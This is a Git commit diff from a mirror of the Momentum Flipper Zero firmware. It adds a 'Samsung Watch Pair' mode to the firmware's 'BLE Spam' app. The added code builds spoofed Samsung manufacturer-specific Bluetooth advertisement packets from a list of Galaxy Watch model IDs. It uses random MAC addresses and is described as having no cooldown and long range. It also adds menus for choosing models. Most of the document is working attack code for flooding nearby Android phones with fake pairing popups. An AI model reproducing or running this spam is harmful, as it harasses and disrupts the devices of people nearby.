Mirror/Momentum-Firmware
1
0
Fork 0
mirror of https://github.com/Next-Flip/Momentum-Firmware.git synced 2026-05-13 07:38:35 -07:00
Code Issues Packages Projects Releases Wiki Activity

BLE Spam add Samsung Watch spam

Browse Source
This commit is contained in:
Willy-JL
2023-10-21 03:54:59 +01:00
parent 857b881554
commit 4a97cb40b8
4 changed files with 227 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files

25
applications/external/ble_spam/ble_spam.c vendored
View File

@@ -88,7 +88,7 @@ static Attack attacks[] = {
}, },
}, },
{ {
.title = "Samsung Buds Pair", .title = "Samsung Buds Popup",
.text = "No cooldown, long range", .text = "No cooldown, long range",
.protocol = &protocol_smartthings, .protocol = &protocol_smartthings,
.payload = .payload =
@@ -96,7 +96,28 @@ static Attack attacks[] = {
.random_mac = true, .random_mac = true,
.cfg = .cfg =
{ {
.smartthings = {}, .smartthings =
{
.type = SmartthingsTypeBuds,
.data = {},
},
},
},
},
{
.title = "Samsung Watch Pair",
.text = "No cooldown, long range",
.protocol = &protocol_smartthings,
.payload =
{
.random_mac = true,
.cfg =
{
.smartthings =
{
.type = SmartthingsTypeWatch,
.data = {},
},
}, },
}, },
}, },

198
applications/external/ble_spam/protocols/smartthings.c vendored
View File

@@ -21,8 +21,42 @@ const struct {
}; };
const uint8_t buds_models_count = COUNT_OF(buds_models); const uint8_t buds_models_count = COUNT_OF(buds_models);
const struct {
uint8_t value;
const char* name;
} watch_models[] = {
{0x01, "White Watch4 Classic 44"},
{0x02, "Black Watch4 Classic 40"},
{0x03, "White Watch4 Classic 40"},
{0x04, "Black Watch4 44mm"},
{0x05, "Silver Watch4 44mm"},
{0x06, "Green Watch4 44mm"},
{0x07, "Black Watch4 40mm"},
{0x08, "White Watch4 40mm"},
{0x09, "Gold Watch4 40mm"},
{0x0a, "French Watch4"},
{0x0b, "French Watch4 Classic"},
{0x0c, "Fox Watch5 44mm"},
{0x11, "Black Watch5 44mm"},
{0x12, "Sapphire Watch5 44mm"},
{0x13, "Purpleish Watch5 40mm"},
{0x14, "Gold Watch5 40mm"},
{0x15, "Black Watch5 Pro 45mm"},
{0x16, "Gray Watch5 Pro 45mm"},
{0x17, "White Watch5 44mm"},
{0x18, "White & Black Watch5"},
{0x1b, "Black Watch6 Pink 40mm"},
{0x1c, "Gold Watch6 Gold 40mm"},
{0x1d, "Silver Watch6 Cyan 44mm"},
{0x1e, "Black Watch6 Classic 43mm"},
{0x20, "Green Goofy"},
{0x1a, "Fallback Watch"},
};
const uint8_t watch_models_count = COUNT_OF(watch_models);
static const char* type_names[SmartthingsTypeMAX] = { static const char* type_names[SmartthingsTypeMAX] = {
[SmartthingsTypeBuds] = "SmartThings Buds", [SmartthingsTypeBuds] = "SmartThings Buds",
[SmartthingsTypeWatch] = "SmartThings Watch",
}; };
static const char* smartthings_get_name(const ProtocolCfg* _cfg) { static const char* smartthings_get_name(const ProtocolCfg* _cfg) {
const SmartthingsCfg* cfg = &_cfg->smartthings; const SmartthingsCfg* cfg = &_cfg->smartthings;
@@ -31,6 +65,7 @@ static const char* smartthings_get_name(const ProtocolCfg* _cfg) {
static uint8_t packet_sizes[SmartthingsTypeMAX] = { static uint8_t packet_sizes[SmartthingsTypeMAX] = {
[SmartthingsTypeBuds] = 31, [SmartthingsTypeBuds] = 31,
[SmartthingsTypeWatch] = 15,
}; };
void smartthings_make_packet(uint8_t* out_size, uint8_t** out_packet, const ProtocolCfg* _cfg) { void smartthings_make_packet(uint8_t* out_size, uint8_t** out_packet, const ProtocolCfg* _cfg) {
const SmartthingsCfg* cfg = _cfg ? &_cfg->smartthings : NULL; const SmartthingsCfg* cfg = _cfg ? &_cfg->smartthings : NULL;
@@ -90,6 +125,31 @@ void smartthings_make_packet(uint8_t* out_size, uint8_t** out_packet, const Prot
// Truncated AD segment, Android seems to fill in the rest with zeros // Truncated AD segment, Android seems to fill in the rest with zeros
break; break;
} }
case SmartthingsTypeWatch: {
uint8_t model;
if(cfg && cfg->data.watch.model != 0x00) {
model = cfg->data.watch.model;
} else {
model = watch_models[rand() % watch_models_count].value;
}
packet[i++] = 14; // Size
packet[i++] = 0xFF; // AD Type (Manufacturer Specific)
packet[i++] = 0x75; // Company ID (Samsung Electronics Co. Ltd.)
packet[i++] = 0x00; // ...
packet[i++] = 0x01;
packet[i++] = 0x00;
packet[i++] = 0x02;
packet[i++] = 0x00;
packet[i++] = 0x01;
packet[i++] = 0x01;
packet[i++] = 0xFF;
packet[i++] = 0x00;
packet[i++] = 0x00;
packet[i++] = 0x43;
packet[i++] = (model >> 0x00) & 0xFF;
break;
}
default: default:
break; break;
} }
@@ -102,6 +162,10 @@ enum {
_ConfigBudsExtraStart = ConfigExtraStart, _ConfigBudsExtraStart = ConfigExtraStart,
ConfigBudsModel, ConfigBudsModel,
}; };
enum {
_ConfigWatchExtraStart = ConfigExtraStart,
ConfigWatchModel,
};
static void config_callback(void* _ctx, uint32_t index) { static void config_callback(void* _ctx, uint32_t index) {
Ctx* ctx = _ctx; Ctx* ctx = _ctx;
SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings; SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings;
@@ -117,6 +181,16 @@ static void config_callback(void* _ctx, uint32_t index) {
} }
break; break;
} }
case SmartthingsTypeWatch: {
switch(index) {
case ConfigWatchModel:
scene_manager_next_scene(ctx->scene_manager, SceneSmartthingsWatchModel);
break;
default:
break;
}
break;
}
default: default:
break; break;
} }
@@ -133,6 +207,18 @@ static void buds_model_changed(VariableItem* item) {
variable_item_set_current_value_text(item, "Random"); variable_item_set_current_value_text(item, "Random");
} }
} }
static void watch_model_changed(VariableItem* item) {
SmartthingsCfg* cfg = variable_item_get_context(item);
uint8_t index = variable_item_get_current_value_index(item);
if(index) {
index--;
cfg->data.watch.model = watch_models[index].value;
variable_item_set_current_value_text(item, watch_models[index].name);
} else {
cfg->data.watch.model = 0x00;
variable_item_set_current_value_text(item, "Random");
}
}
static void smartthings_extra_config(Ctx* ctx) { static void smartthings_extra_config(Ctx* ctx) {
SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings; SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings;
VariableItemList* list = ctx->variable_item_list; VariableItemList* list = ctx->variable_item_list;
@@ -166,6 +252,32 @@ static void smartthings_extra_config(Ctx* ctx) {
variable_item_set_current_value_text(item, model_name); variable_item_set_current_value_text(item, model_name);
break; break;
} }
case SmartthingsTypeWatch: {
item = variable_item_list_add(
list, "Model", watch_models_count + 1, watch_model_changed, cfg);
const char* model_name = NULL;
char model_name_buf[3];
if(cfg->data.watch.model == 0x00) {
model_name = "Random";
value_index = 0;
} else {
for(uint8_t i = 0; i < watch_models_count; i++) {
if(cfg->data.watch.model == watch_models[i].value) {
model_name = watch_models[i].name;
value_index = i + 1;
break;
}
}
if(!model_name) {
snprintf(model_name_buf, sizeof(model_name_buf), "%02X", cfg->data.watch.model);
model_name = model_name_buf;
value_index = watch_models_count + 1;
}
}
variable_item_set_current_value_index(item, value_index);
variable_item_set_current_value_text(item, model_name);
break;
}
default: default:
break; break;
} }
@@ -268,3 +380,89 @@ void scene_smartthings_buds_model_custom_on_exit(void* _ctx) {
cfg->data.buds.model = cfg->data.buds.model =
(ctx->byte_store[0] << 0x10) + (ctx->byte_store[1] << 0x08) + (ctx->byte_store[2] << 0x00); (ctx->byte_store[0] << 0x10) + (ctx->byte_store[1] << 0x08) + (ctx->byte_store[2] << 0x00);
} }
static void watch_model_callback(void* _ctx, uint32_t index) {
Ctx* ctx = _ctx;
SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings;
switch(index) {
case 0:
cfg->data.watch.model = 0x00;
scene_manager_previous_scene(ctx->scene_manager);
break;
case watch_models_count + 1:
scene_manager_next_scene(ctx->scene_manager, SceneSmartthingsWatchModelCustom);
break;
default:
cfg->data.watch.model = watch_models[index - 1].value;
scene_manager_previous_scene(ctx->scene_manager);
break;
}
}
void scene_smartthings_watch_model_on_enter(void* _ctx) {
Ctx* ctx = _ctx;
SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings;
Submenu* submenu = ctx->submenu;
uint32_t selected = 0;
bool found = false;
submenu_reset(submenu);
submenu_add_item(submenu, "Random", 0, watch_model_callback, ctx);
if(cfg->data.watch.model == 0x00) {
found = true;
selected = 0;
}
for(uint8_t i = 0; i < watch_models_count; i++) {
submenu_add_item(submenu, watch_models[i].name, i + 1, watch_model_callback, ctx);
if(!found && cfg->data.watch.model == watch_models[i].value) {
found = true;
selected = i + 1;
}
}
submenu_add_item(submenu, "Custom", watch_models_count + 1, watch_model_callback, ctx);
if(!found) {
found = true;
selected = watch_models_count + 1;
}
submenu_set_selected_item(submenu, selected);
view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewSubmenu);
}
bool scene_smartthings_watch_model_on_event(void* _ctx, SceneManagerEvent event) {
UNUSED(_ctx);
UNUSED(event);
return false;
}
void scene_smartthings_watch_model_on_exit(void* _ctx) {
UNUSED(_ctx);
}
static void watch_model_custom_callback(void* _ctx) {
Ctx* ctx = _ctx;
scene_manager_previous_scene(ctx->scene_manager);
scene_manager_previous_scene(ctx->scene_manager);
}
void scene_smartthings_watch_model_custom_on_enter(void* _ctx) {
Ctx* ctx = _ctx;
SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings;
ByteInput* byte_input = ctx->byte_input;
byte_input_set_header_text(byte_input, "Enter custom Model");
ctx->byte_store[0] = (cfg->data.watch.model >> 0x00) & 0xFF;
byte_input_set_result_callback(
byte_input, watch_model_custom_callback, NULL, ctx, (void*)ctx->byte_store, 1);
view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewByteInput);
}
bool scene_smartthings_watch_model_custom_on_event(void* _ctx, SceneManagerEvent event) {
UNUSED(_ctx);
UNUSED(event);
return false;
}
void scene_smartthings_watch_model_custom_on_exit(void* _ctx) {
Ctx* ctx = _ctx;
SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings;
cfg->data.watch.model = (ctx->byte_store[0] << 0x00);
}

4
applications/external/ble_spam/protocols/smartthings.h vendored
View File

@@ -6,6 +6,7 @@
typedef enum { typedef enum {
SmartthingsTypeBuds, SmartthingsTypeBuds,
SmartthingsTypeWatch,
SmartthingsTypeMAX, SmartthingsTypeMAX,
} SmartthingsType; } SmartthingsType;
@@ -15,6 +16,9 @@ typedef struct {
struct { struct {
uint32_t model; uint32_t model;
} buds; } buds;
struct {
uint8_t model;
} watch;
} data; } data;
} SmartthingsCfg; } SmartthingsCfg;

2
applications/external/ble_spam/protocols/smartthings_scenes.h vendored
View File

@@ -1,2 +1,4 @@
ADD_SCENE(smartthings_buds_model, SmartthingsBudsModel) ADD_SCENE(smartthings_buds_model, SmartthingsBudsModel)
ADD_SCENE(smartthings_buds_model_custom, SmartthingsBudsModelCustom) ADD_SCENE(smartthings_buds_model_custom, SmartthingsBudsModelCustom)
ADD_SCENE(smartthings_watch_model, SmartthingsWatchModel)
ADD_SCENE(smartthings_watch_model_custom, SmartthingsWatchModelCustom)